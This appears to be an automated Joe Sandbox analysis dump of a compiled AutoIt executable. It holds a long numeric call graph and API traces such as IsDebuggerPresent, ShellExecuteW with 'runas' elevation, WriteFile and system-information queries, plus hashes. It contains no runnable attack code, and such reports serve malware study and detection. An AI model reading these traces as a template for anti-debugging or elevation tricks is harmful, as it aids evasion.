94838 53c41b 94809->94838 94811 53c432 94810->94811 94812 4f44ed 64 API calls 94811->94812 94813 53c442 94812->94813 94814 4f44ed 64 API calls 94813->94814 94815 53c45d 94814->94815 94816 4f44ed 64 API calls 94815->94816 94817 53c478 94816->94817 94818 4f4517 83 API calls 94817->94818 94819 53c48f 94818->94819 94820 51395c __crtGetStringTypeA_stat 47 API calls 94819->94820 94821 53c496 94820->94821 94822 51395c __crtGetStringTypeA_stat 47 API calls 94821->94822 94823 53c4a0 94822->94823 94824 4f44ed 64 API calls 94823->94824 94825 53c4b4 94824->94825 94826 53bf5a GetSystemTimeAsFileTime 94825->94826 94827 53c4c7 94826->94827 94828 53c4f1 94827->94828 94829 53c4dc 94827->94829 94830 53c4f7 94828->94830 94831 53c556 94828->94831 94832 511c9d _free 47 API calls 94829->94832 94840 53b965 118 API calls __fcloseall 94830->94840 94835 511c9d _free 47 API calls 94831->94835 94833 53c4e2 94832->94833 94836 511c9d _free 47 API calls 94833->94836 94835->94838 94836->94838 94837 53c54e 94839 511c9d _free 47 API calls 94837->94839 94838->94775 94838->94777 94839->94838 94840->94837 94841->94797 94842->94799 94843->94796 94845 51f8a0 __ftell_nolock 94844->94845 94846 4f40b4 GetLongPathNameW 94845->94846 94847 4f6a63 48 API calls 94846->94847 94848 4f40dc 94847->94848 94849 4f49a0 94848->94849 94850 4fd7f7 48 API calls 94849->94850 94851 4f49b2 94850->94851 94852 4f660f 49 API calls 94851->94852 94853 4f49bd 94852->94853 94854 4f49c8 94853->94854 94858 562e35 94853->94858 94855 4f64cf 48 API calls 94854->94855 94857 4f49d4 94855->94857 94896 4f28a6 94857->94896 94860 562e4f 94858->94860 94902 50d35e 60 API calls 94858->94902 94861 4f49e7 Mailbox 94861->94704 94863 4f41a9 136 API calls 94862->94863 94864 4f415e 94863->94864 94865 563489 94864->94865 94866 4f41a9 136 API calls 94864->94866 94867 53c396 122 API calls 94865->94867 94868 4f4172 94866->94868 94869 56349e 94867->94869 94868->94865 94872 4f417a 94868->94872 94870 5634a2 94869->94870 94871 5634bf 94869->94871 94873 4f4252 84 API calls 94870->94873 94874 50f4ea 48 API calls 94871->94874 94875 4f4186 94872->94875 94876 5634aa 94872->94876 94873->94876 94888 563504 Mailbox 94874->94888 94903 4fc833 94875->94903 94999 536b49 87 API calls _wprintf 94876->94999 94879 5634b8 94879->94871 94881 5636b4 94882 511c9d _free 47 API calls 94881->94882 94883 5636bc 94882->94883 94884 4f4252 84 API calls 94883->94884 94890 5636c5 94884->94890 94885 4fba85 48 API calls 94885->94888 94888->94881 94888->94885 94888->94890 94893 4fce19 48 API calls 94888->94893 94990 532551 94888->94990 94993 4f4dd9 94888->94993 95000 532472 60 API calls 2 library calls 94888->95000 95001 539c12 48 API calls 94888->95001 94889 511c9d _free 47 API calls 94889->94890 94890->94889 94892 4f4252 84 API calls 94890->94892 95002 5325b5 86 API calls 4 library calls 94890->95002 94892->94890 94893->94888 94897 4f28b8 94896->94897 94901 4f28d7 _memcpy_s 94896->94901 94900 50f4ea 48 API calls 94897->94900 94898 50f4ea 48 API calls 94899 4f28ee 94898->94899 94899->94861 94900->94901 94901->94898 94902->94858 94904 4fc843 __ftell_nolock 94903->94904 94905 563095 94904->94905 94906 4fc860 94904->94906 95024 5325b5 86 API calls 4 library calls 94905->95024 95008 4f48ba 49 API calls 94906->95008 94909 5630a8 95025 5325b5 86 API calls 4 library calls 94909->95025 94910 4fc882 95009 4f4550 56 API calls 94910->95009 94912 4fc897 94912->94909 94914 4fc89f 94912->94914 94916 4fd7f7 48 API calls 94914->94916 94915 5630c4 94919 4fc90c 94915->94919 94917 4fc8ab 94916->94917 95010 50e968 49 API calls __ftell_nolock 94917->95010 94921 5630d7 94919->94921 94922 4fc91a 94919->94922 94920 4fc8b7 94923 4fd7f7 48 API calls 94920->94923 94925 4f4907 CloseHandle 94921->94925 94924 511dfc __wsplitpath 47 API calls 94922->94924 94927 4fc8c3 94923->94927 94932 4fc943 _wcscat _wcscpy 94924->94932 94926 5630e3 94925->94926 94928 4f41a9 136 API calls 94926->94928 94929 4f660f 49 API calls 94927->94929 94930 56310d 94928->94930 94931 4fc8d1 94929->94931 94933 563136 94930->94933 94936 53c396 122 API calls 94930->94936 95011 50eb66 SetFilePointerEx ReadFile 94931->95011 94935 4fc96d SetCurrentDirectoryW 94932->94935 95026 5325b5 86 API calls 4 library calls 94933->95026 94939 50f4ea 48 API calls 94935->94939 94940 563129 94936->94940 94937 4fc8fd 95012 4f46ce SetFilePointerEx SetFilePointerEx 94937->95012 94942 4fc988 94939->94942 94943 563152 94940->94943 94944 563131 94940->94944 94945 4f47b7 48 API calls 94942->94945 94947 4f4252 84 API calls 94943->94947 94946 4f4252 84 API calls 94944->94946 94975 4fc993 Mailbox __NMSG_WRITE 94945->94975 94946->94933 94948 563157 94947->94948 94949 50f4ea 48 API calls 94948->94949 94956 563194 94949->94956 94950 4fca9d 95020 4f4907 94950->95020 94954 4fcaa9 SetCurrentDirectoryW 94977 4fcad1 Mailbox 94954->94977 94955 4f3d98 94955->94578 94955->94601 94958 4fba85 48 API calls 94956->94958 94987 5631dd Mailbox 94958->94987 94960 5633ce 95030 539b72 48 API calls 94960->95030 94961 563467 95034 5325b5 86 API calls 4 library calls 94961->95034 94964 563480 94964->94950 94966 5633f0 95031 5529e8 48 API calls _memcpy_s 94966->95031 94968 5633fd 94971 511c9d _free 47 API calls 94968->94971 94970 56345f 95033 53240b 48 API calls 3 library calls 94970->95033 94971->94977 94972 4fce19 48 API calls 94972->94975 94974 4fba85 48 API calls 94974->94987 94975->94950 94975->94961 94975->94970 94975->94972 95013 4fb337 56 API calls _wcscpy 94975->95013 95014 50c258 GetStringTypeW 94975->95014 95015 4fcb93 59 API calls __wcsnicmp 94975->95015 95016 4fcb5a GetStringTypeW __NMSG_WRITE 94975->95016 95017 5116d0 GetStringTypeW __towlower_l 94975->95017 95018 4fcc24 162 API calls 3 library calls 94975->95018 95019 50c682 48 API calls 94975->95019 95003 4f48dd 94977->95003 94979 532551 48 API calls 94979->94987 94981 4fce19 48 API calls 94981->94987 94984 563420 95032 5325b5 86 API calls 4 library calls 94984->95032 94986 563439 94988 511c9d _free 47 API calls 94986->94988 94987->94960 94987->94974 94987->94979 94987->94981 94987->94984 95027 532472 60 API calls 2 library calls 94987->95027 95028 539c12 48 API calls 94987->95028 95029 50c682 48 API calls 94987->95029 94989 56314d 94988->94989 94989->94977 94991 50f4ea 48 API calls 94990->94991 94992 532581 _memcpy_s 94991->94992 94992->94888 94992->94992 94994 4f4dec 94993->94994 94997 4f4e9a 94993->94997 94996 50f4ea 48 API calls 94994->94996 94998 4f4e1e 94994->94998 94995 50f4ea 48 API calls 94995->94998 94996->94998 94997->94888 94998->94995 94998->94997 94999->94879 95000->94888 95001->94888 95002->94890 95004 4f4907 CloseHandle 95003->95004 95005 4f48e5 Mailbox 95004->95005 95006 4f4907 CloseHandle 95005->95006 95007 4f48fc 95006->95007 95007->94955 95008->94910 95009->94912 95010->94920 95011->94937 95012->94919 95013->94975 95014->94975 95015->94975 95016->94975 95017->94975 95018->94975 95019->94975 95021 4f4911 95020->95021 95022 4f4920 95020->95022 95021->94954 95022->95021 95023 4f4925 CloseHandle 95022->95023 95023->95021 95024->94909 95025->94915 95026->94989 95027->94987 95028->94987 95029->94987 95030->94966 95031->94968 95032->94986 95033->94961 95034->94964 95036 4f4c8b 95035->95036 95037 4f4d94 95035->95037 95036->95037 95038 50f4ea 48 API calls 95036->95038 95037->94710 95039 4f4cb2 95038->95039 95040 50f4ea 48 API calls 95039->95040 95041 4f4d22 95040->95041 95041->95037 95042 4fb470 91 API calls 95041->95042 95044 4f4dd9 48 API calls 95041->95044 95045 4fba85 48 API calls 95041->95045 95048 539af1 48 API calls 95041->95048 95042->95041 95044->95041 95045->95041 95046->94713 95047->94715 95048->95041 95050 4f403c LoadImageW 95049->95050 95051 56418d EnumResourceNamesW 95049->95051 95052 4f3ee1 RegisterClassExW 95050->95052 95051->95052 95053 4f3f53 7 API calls 95052->95053 95053->94729 95055 563c33 95054->95055 95056 4f4c44 95054->95056 95055->95056 95057 563c3c DestroyIcon 95055->95057 95056->94739 95080 535819 61 API calls _W_store_winword 95056->95080 95057->95056 95059 4f51cb 95058->95059 95060 4f52a2 Mailbox 95058->95060 95061 4f6b0f 48 API calls 95059->95061 95060->94740 95062 4f51d9 95061->95062 95063 563ca1 LoadStringW 95062->95063 95064 4f51e6 95062->95064 95067 563cbb 95063->95067 95065 4f6a63 48 API calls 95064->95065 95066 4f51fb 95065->95066 95066->95067 95080->94739 95082 4fb392 95081->95082 95089 4fb3c5 _memcpy_s 95081->95089 95083 4fb3fd 95082->95083 95084 4fb3b8 95082->95084 95082->95089 95086 50f4ea 48 API calls 95083->95086 95085 4fbb85 48 API calls 95084->95085 95085->95089 95087 4fb407 95086->95087 95088 50f4ea 48 API calls 95087->95088 95088->95089 95089->94750 95090->94749 95091 5619ba 95096 50c75a 95091->95096 95095 5619c9 95097 4fd7f7 48 API calls 95096->95097 95098 50c7c8 95097->95098 95104 50d26c 95098->95104 95101 50c865 95102 50c881 95101->95102 95107 50d1fa 48 API calls _memcpy_s 95101->95107 95103 510f0a 52 API calls __cinit 95102->95103 95103->95095 95108 50d298 95104->95108 95107->95101 95109 50d2a5 95108->95109 95111 50d28b 95108->95111 95110 50d2ac RegOpenKeyExW 95109->95110 95109->95111 95110->95111 95112 50d2c6 RegQueryValueExW 95110->95112 95111->95101 95113 50d2e7 95112->95113 95114 50d2fc RegCloseKey 95112->95114 95113->95114 95114->95111 95115 4f3742 95116 4f374b 95115->95116 95117 4f3769 95116->95117 95118 4f37c8 95116->95118 95154 4f37c6 95116->95154 95122 4f382c PostQuitMessage 95117->95122 95123 4f3776 95117->95123 95120 4f37ce 95118->95120 95121 561e00 95118->95121 95119 4f37ab DefWindowProcW 95126 4f37b9 95119->95126 95127 4f37f6 SetTimer RegisterWindowMessageW 95120->95127 95128 4f37d3 95120->95128 95170 4f2ff6 16 API calls 95121->95170 95122->95126 95124 561e88 95123->95124 95125 4f3781 95123->95125 95175 534ddd 60 API calls _memset 95124->95175 95131 4f3789 95125->95131 95132 4f3836 95125->95132 95127->95126 95133 4f381f CreatePopupMenu 95127->95133 95135 561da3 95128->95135 95136 4f37da KillTimer 95128->95136 95130 561e27 95171 50e312 335 API calls Mailbox 95130->95171 95138 561e6d 95131->95138 95139 4f3794 95131->95139 95160 50eb83 95132->95160 95133->95126 95142 561ddc MoveWindow 95135->95142 95143 561da8 95135->95143 95167 4f3847 Shell_NotifyIconW _memset 95136->95167 95138->95119 95174 52a5f3 48 API calls 95138->95174 95145 4f379f 95139->95145 95146 561e58 95139->95146 95140 561e9a 95140->95119 95140->95126 95142->95126 95147 561dac 95143->95147 95148 561dcb SetFocus 95143->95148 95145->95119 95172 4f3847 Shell_NotifyIconW _memset 95145->95172 95173 5355bd 70 API calls _memset 95146->95173 95147->95145 95150 561db5 95147->95150 95148->95126 95149 4f37ed 95168 4f390f DeleteObject DestroyWindow Mailbox 95149->95168 95169 4f2ff6 16 API calls 95150->95169 95154->95119 95156 561e68 95156->95126 95158 561e4c 95159 4f4ffc 67 API calls 95158->95159 95159->95154 95161 50eb9a _memset 95160->95161 95162 50ec1c 95160->95162 95163 4f51af 50 API calls 95161->95163 95162->95126 95166 50ebc1 95163->95166 95164 50ec05 KillTimer SetTimer 95164->95162 95165 563c7a Shell_NotifyIconW 95165->95164 95166->95164 95166->95165 95167->95149 95168->95126 95169->95126 95170->95130 95171->95145 95172->95158 95173->95156 95174->95154 95175->95140 95176 56197b 95181 50dd94 95176->95181 95180 56198a 95182 50f4ea 48 API calls 95181->95182 95183 50dd9c 95182->95183 95184 50ddb0 95183->95184 95189 50df3d 95183->95189 95188 510f0a 52 API calls __cinit 95184->95188 95188->95180 95190 50df46 95189->95190 95191 50dda8 95189->95191 95221 510f0a 52 API calls __cinit 95190->95221 95193 50ddc0 95191->95193 95194 4fd7f7 48 API calls 95193->95194 95195 50ddd7 GetVersionExW 95194->95195 95196 4f6a63 48 API calls 95195->95196 95197 50de1a 95196->95197 95222 50dfb4 95197->95222 95200 4f6571 48 API calls 95204 50de2e 95200->95204 95202 5624c8 95204->95202 95226 50df77 95204->95226 95205 50dea4 GetCurrentProcess 95235 50df5f LoadLibraryA GetProcAddress 95205->95235 95206 50debb 95207 50df31 GetSystemInfo 95206->95207 95208 50dee3 95206->95208 95211 50df0e 95207->95211 95229 50e00c 95208->95229 95213 50df21 95211->95213 95214 50df1c FreeLibrary 95211->95214 95213->95184 95214->95213 95215 50df29 GetSystemInfo 95218 50df03 95215->95218 95216 50def9 95232 50dff4 95216->95232 95218->95211 95220 50df09 FreeLibrary 95218->95220 95220->95211 95221->95191 95223 50dfbd 95222->95223 95224 4fb18b 48 API calls 95223->95224 95225 50de22 95224->95225 95225->95200 95236 50df89 95226->95236 95240 50e01e 95229->95240 95233 50e00c 2 API calls 95232->95233 95234 50df01 GetNativeSystemInfo 95233->95234 95234->95218 95235->95206 95237 50dea0 95236->95237 95238 50df92 LoadLibraryA 95236->95238 95237->95205 95237->95206 95238->95237 95239 50dfa3 GetProcAddress 95238->95239 95239->95237 95241 50def1 95240->95241 95242 50e027 LoadLibraryA 95240->95242 95241->95215 95241->95216 95242->95241 95243 50e038 GetProcAddress 95242->95243 95243->95241 95244 5619cb 95249 4f2322 95244->95249 95246 5619d1 95282 510f0a 52 API calls __cinit 95246->95282 95248 5619db 95250 4f2344 95249->95250 95283 4f26df 95250->95283 95255 4fd7f7 48 API calls 95256 4f2384 95255->95256 95257 4fd7f7 48 API calls 95256->95257 95258 4f238e 95257->95258 95259 4fd7f7 48 API calls 95258->95259 95260 4f2398 95259->95260 95261 4fd7f7 48 API calls 95260->95261 95262 4f23de 95261->95262 95263 4fd7f7 48 API calls 95262->95263 95264 4f24c1 95263->95264 95291 4f263f 95264->95291 95268 4f24f1 95269 4fd7f7 48 API calls 95268->95269 95270 4f24fb 95269->95270 95320 4f2745 95270->95320 95272 4f2546 95273 4f2556 GetStdHandle 95272->95273 95274 56501d 95273->95274 95275 4f25b1 95273->95275 95274->95275 95277 565026 95274->95277 95276 4f25b7 CoInitialize 95275->95276 95276->95246 95327 5392d4 53 API calls 95277->95327 95279 56502d 95328 5399f9 CreateThread 95279->95328 95281 565039 CloseHandle 95281->95276 95282->95248 95329 4f2854 95283->95329 95286 4f6a63 48 API calls 95287 4f234a 95286->95287 95288 4f272e 95287->95288 95343 4f27ec 6 API calls 95288->95343 95290 4f237a 95290->95255 95292 4fd7f7 48 API calls 95291->95292 95293 4f264f 95292->95293 95294 4fd7f7 48 API calls 95293->95294 95295 4f2657 95294->95295 95344 4f26a7 95295->95344 95298 4f26a7 48 API calls 95299 4f2667 95298->95299 95300 4fd7f7 48 API calls 95299->95300 95301 4f2672 95300->95301 95302 50f4ea 48 API calls 95301->95302 95303 4f24cb 95302->95303 95304 4f22a4 95303->95304 95305 4f22b2 95304->95305 95306 4fd7f7 48 API calls 95305->95306 95307 4f22bd 95306->95307 95308 4fd7f7 48 API calls 95307->95308 95309 4f22c8 95308->95309 95310 4fd7f7 48 API calls 95309->95310 95311 4f22d3 95310->95311 95312 4fd7f7 48 API calls 95311->95312 95313 4f22de 95312->95313 95314 4f26a7 48 API calls 95313->95314 95315 4f22e9 95314->95315 95316 50f4ea 48 API calls 95315->95316 95317 4f22f0 95316->95317 95318 561fe7 95317->95318 95319 4f22f9 RegisterWindowMessageW 95317->95319 95319->95268 95321 4f2755 95320->95321 95322 565f4d 95320->95322 95323 50f4ea 48 API calls 95321->95323 95349 53c942 50 API calls 95322->95349 95326 4f275d 95323->95326 95325 565f58 95326->95272 95327->95279 95328->95281 95350 5399df 54 API calls 95328->95350 95336 4f2870 95329->95336 95332 4f2870 48 API calls 95333 4f2864 95332->95333 95334 4fd7f7 48 API calls 95333->95334 95335 4f2716 95334->95335 95335->95286 95337 4fd7f7 48 API calls 95336->95337 95338 4f287b 95337->95338 95339 4fd7f7 48 API calls 95338->95339 95340 4f2883 95339->95340 95341 4fd7f7 48 API calls 95340->95341 95342 4f285c 95341->95342 95342->95332 95343->95290 95345 4fd7f7 48 API calls 95344->95345 95346 4f26b0 95345->95346 95347 4fd7f7 48 API calls 95346->95347 95348 4f265f 95347->95348 95348->95298 95349->95325 95351 568eb8 95355 53a635 95351->95355 95353 568ec3 95354 53a635 84 API calls 95353->95354 95354->95353 95356 53a642 95355->95356 95365 53a66f 95355->95365 95357 53a671 95356->95357 95359 53a676 95356->95359 95363 53a669 95356->95363 95356->95365 95367 50ec4e 81 API calls 95357->95367 95360 4f936c 81 API calls 95359->95360 95361 53a67d 95360->95361 95362 4f510d 48 API calls 95361->95362 95362->95365 95366 504525 61 API calls _memcpy_s 95363->95366 95365->95353 95366->95365 95367->95359

                                                                                  Executed Functions

                                                                                  Function 0051B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 643 51b043-51b080 call 51f8a0 646 51b082-51b084 643->646 647 51b089-51b08b 643->647 648 51b860-51b86c call 51a70c 646->648 649 51b08d-51b0a7 call 517bda call 517c0e call 516e10 647->649 650 51b0ac-51b0d9 647->650 649->648 652 51b0e0-51b0e7 650->652 653 51b0db-51b0de 650->653 658 51b105 652->658 659 51b0e9-51b100 call 517bda call 517c0e call 516e10 652->659 653->652 657 51b10b-51b110 653->657 661 51b112-51b11c call 51f82f 657->661 662 51b11f-51b12d call 523bf2 657->662 658->657 686 51b851-51b854 659->686 661->662 673 51b133-51b145 662->673 674 51b44b-51b45d 662->674 673->674 677 51b14b-51b183 call 517a0d GetConsoleMode 673->677 678 51b463-51b473 674->678 679 51b7b8-51b7d5 WriteFile 674->679 677->674 700 51b189-51b18f 677->700 684 51b479-51b484 678->684 685 51b55a-51b55f 678->685 681 51b7e1-51b7e7 GetLastError 679->681 682 51b7d7-51b7df 679->682 687 51b7e9 681->687 682->687 691 51b81b-51b833 684->691 692 51b48a-51b49a 684->692 688 51b663-51b66e 685->688 689 51b565-51b56e 685->689 699 51b85e-51b85f 686->699 697 51b7ef-51b7f1 687->697 688->691 696 51b674 688->696 689->691 698 51b574 689->698 694 51b835-51b838 691->694 695 51b83e-51b84e call 517c0e call 517bda 691->695 693 51b4a0-51b4a3 692->693 701 51b4a5-51b4be 693->701 702 51b4e9-51b520 WriteFile 693->702 694->695 703 51b83a-51b83c 694->703 695->686 704 51b67e-51b693 696->704 706 51b7f3-51b7f5 697->706 707 51b856-51b85c 697->707 708 51b57e-51b595 698->708 699->648 709 51b191-51b193 700->709 710 51b199-51b1bc GetConsoleCP 700->710 713 51b4c0-51b4ca 701->713 714 51b4cb-51b4e7 701->714 702->681 715 51b526-51b538 702->715 703->699 716 51b699-51b69b 704->716 706->691 718 51b7f7-51b7fc 706->718 707->699 719 51b59b-51b59e 708->719 709->674 709->710 711 51b440-51b446 710->711 712 51b1c2-51b1ca 710->712 711->706 720 51b1d4-51b1d6 712->720 713->714 714->693 714->702 715->697 721 51b53e-51b54f 715->721 722 51b6d8-51b719 WideCharToMultiByte 716->722 723 51b69d-51b6b3 716->723 725 51b812-51b819 call 517bed 718->725 726 51b7fe-51b810 call 517c0e call 517bda 718->726 727 51b5a0-51b5b6 719->727 728 51b5de-51b627 WriteFile 719->728 731 51b36b-51b36e 720->731 732 51b1dc-51b1fe 720->732 721->692 733 51b555 721->733 722->681 737 51b71f-51b721 722->737 734 51b6b5-51b6c4 723->734 735 51b6c7-51b6d6 723->735 725->686 726->686 739 51b5b8-51b5ca 727->739 740 51b5cd-51b5dc 727->740 728->681 730 51b62d-51b645 728->730 730->697 742 51b64b-51b658 730->742 745 51b370-51b373 731->745 746 51b375-51b3a2 731->746 743 51b200-51b215 732->743 744 51b217-51b223 call 511688 732->744 733->697 734->735 735->716 735->722 747 51b727-51b75a WriteFile 737->747 739->740 740->719 740->728 742->708 749 51b65e 742->749 750 51b271-51b283 call 5240f7 743->750 765 51b225-51b239 744->765 766 51b269-51b26b 744->766 745->746 752 51b3a8-51b3ab 745->752 746->752 753 51b77a-51b78e GetLastError 747->753 754 51b75c-51b776 747->754 749->697 770 51b435-51b43b 750->770 771 51b289 750->771 758 51b3b2-51b3c5 call 525884 752->758 759 51b3ad-51b3b0 752->759 756 51b794-51b796 753->756 754->747 761 51b778 754->761 756->687 764 51b798-51b7b0 756->764 758->681 776 51b3cb-51b3d5 758->776 759->758 767 51b407-51b40a 759->767 761->756 764->704 772 51b7b6 764->772 774 51b412-51b42d 765->774 775 51b23f-51b254 call 5240f7 765->775 766->750 767->720 773 51b410 767->773 770->687 777 51b28f-51b2c4 WideCharToMultiByte 771->777 772->697 773->770 774->770 775->770 785 51b25a-51b267 775->785 779 51b3d7-51b3ee call 525884 776->779 780 51b3fb-51b401 776->780 777->770 781 51b2ca-51b2f0 WriteFile 777->781 779->681 788 51b3f4-51b3f5 779->788 780->767 781->681 784 51b2f6-51b30e 781->784 784->770 787 51b314-51b31b 784->787 785->777 787->780 789 51b321-51b34c WriteFile 787->789 788->780 789->681 790 51b352-51b359 789->790 790->770 791 51b35f-51b366 790->791 791->780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: db710b156c6dcbca5f38dbdf8cba89ce60afd8a42aecc60cfe17c596b5a5c36c
                                                                                  • Instruction ID: 4f442c4ca6fda0f11ab1e5a076983fbe646b55f7e4069420228ba769e7c917f6
                                                                                  • Opcode Fuzzy Hash: db710b156c6dcbca5f38dbdf8cba89ce60afd8a42aecc60cfe17c596b5a5c36c
                                                                                  • Instruction Fuzzy Hash: 84324C75A022298FEB249F14DC856E9BBB5FF4A310F5841D9E40AE7A91D7309EC0CF52
                                                                                  Function 004F3D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,004F3AA3,?), ref: 004F3D45
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,004F3AA3,?), ref: 004F3D57
                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,005B1148,005B1130,?,?,?,?,004F3AA3,?), ref: 004F3DC8
                                                                                    • Part of subcall function 004F6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,004F3DEE,005B1148,?,?,?,?,?,004F3AA3,?), ref: 004F6471
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,004F3AA3,?), ref: 004F3E48
                                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,005A28F4,00000010), ref: 00561CCE
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,005B1148,?,?,?,?,?,004F3AA3,?), ref: 00561D06
                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0058DAB4,005B1148,?,?,?,?,?,004F3AA3,?), ref: 00561D89
                                                                                  • ShellExecuteW.SHELL32(00000000,?,?,?,?,004F3AA3), ref: 00561D90
                                                                                    • Part of subcall function 004F3E6E: GetSysColorBrush.USER32(0000000F), ref: 004F3E79
                                                                                    • Part of subcall function 004F3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 004F3E88
                                                                                    • Part of subcall function 004F3E6E: LoadIconW.USER32(00000063), ref: 004F3E9E
                                                                                    • Part of subcall function 004F3E6E: LoadIconW.USER32(000000A4), ref: 004F3EB0
                                                                                    • Part of subcall function 004F3E6E: LoadIconW.USER32(000000A2), ref: 004F3EC2
                                                                                    • Part of subcall function 004F3E6E: RegisterClassExW.USER32(?), ref: 004F3F30
                                                                                    • Part of subcall function 004F36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004F36E6
                                                                                    • Part of subcall function 004F36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004F3707
                                                                                    • Part of subcall function 004F36B8: ShowWindow.USER32(00000000,?,?,?,?,004F3AA3,?), ref: 004F371B
                                                                                    • Part of subcall function 004F36B8: ShowWindow.USER32(00000000,?,?,?,?,004F3AA3,?), ref: 004F3724
                                                                                    • Part of subcall function 004F4FFC: _memset.LIBCMT ref: 004F5022
                                                                                    • Part of subcall function 004F4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004F50CB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                  • String ID: ()Z$This is a third-party compiled AutoIt script.$runas
                                                                                  • API String ID: 438480954-3942923355
                                                                                  • Opcode ID: 83e40942890f5a689db88c7085eb066821408325f4f4cfc31a1f0f442ae5025c
                                                                                  • Instruction ID: 479cecd80ab7d32af071947a147c0e7a0cab7b27f7bb52e15ce5c7fdf4377898
                                                                                  • Opcode Fuzzy Hash: 83e40942890f5a689db88c7085eb066821408325f4f4cfc31a1f0f442ae5025c
                                                                                  • Instruction Fuzzy Hash: 9A512830D0464CBACB11ABB9EC56DFE7F79AF15704F00416AF30162192CA286649EB39
                                                                                  Function 0050DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1075 50ddc0-50de4f call 4fd7f7 GetVersionExW call 4f6a63 call 50dfb4 call 4f6571 1084 50de55-50de56 1075->1084 1085 5624c8-5624cb 1075->1085 1086 50de92-50dea2 call 50df77 1084->1086 1087 50de58-50de63 1084->1087 1088 5624e4-5624e8 1085->1088 1089 5624cd 1085->1089 1106 50dea4-50dec1 GetCurrentProcess call 50df5f 1086->1106 1107 50dec7-50dee1 1086->1107 1090 56244e-562454 1087->1090 1091 50de69-50de6b 1087->1091 1094 5624d3-5624dc 1088->1094 1095 5624ea-5624f3 1088->1095 1093 5624d0 1089->1093 1099 562456-562459 1090->1099 1100 56245e-562464 1090->1100 1096 50de71-50de74 1091->1096 1097 562469-562475 1091->1097 1093->1094 1094->1088 1095->1093 1101 5624f5-5624f8 1095->1101 1104 562495-562498 1096->1104 1105 50de7a-50de89 1096->1105 1102 562477-56247a 1097->1102 1103 56247f-562485 1097->1103 1099->1086 1100->1086 1101->1094 1102->1086 1103->1086 1104->1086 1110 56249e-5624b3 1104->1110 1111 56248a-562490 1105->1111 1112 50de8f 1105->1112 1106->1107 1127 50dec3 1106->1127 1108 50df31-50df3b GetSystemInfo 1107->1108 1109 50dee3-50def7 call 50e00c 1107->1109 1118 50df0e-50df1a 1108->1118 1122 50df29-50df2f GetSystemInfo 1109->1122 1123 50def9-50df01 call 50dff4 GetNativeSystemInfo 1109->1123 1115 5624b5-5624b8 1110->1115 1116 5624bd-5624c3 1110->1116 1111->1086 1112->1086 1115->1086 1116->1086 1120 50df21-50df26 1118->1120 1121 50df1c-50df1f FreeLibrary 1118->1121 1121->1120 1126 50df03-50df07 1122->1126 1123->1126 1126->1118 1129 50df09-50df0c FreeLibrary 1126->1129 1127->1107 1129->1118
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 0050DDEC
                                                                                  • GetCurrentProcess.KERNEL32(00000000,0058DC38,?,?), ref: 0050DEAC
                                                                                  • GetNativeSystemInfo.KERNELBASE(?,0058DC38,?,?), ref: 0050DF01
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0050DF0C
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0050DF1F
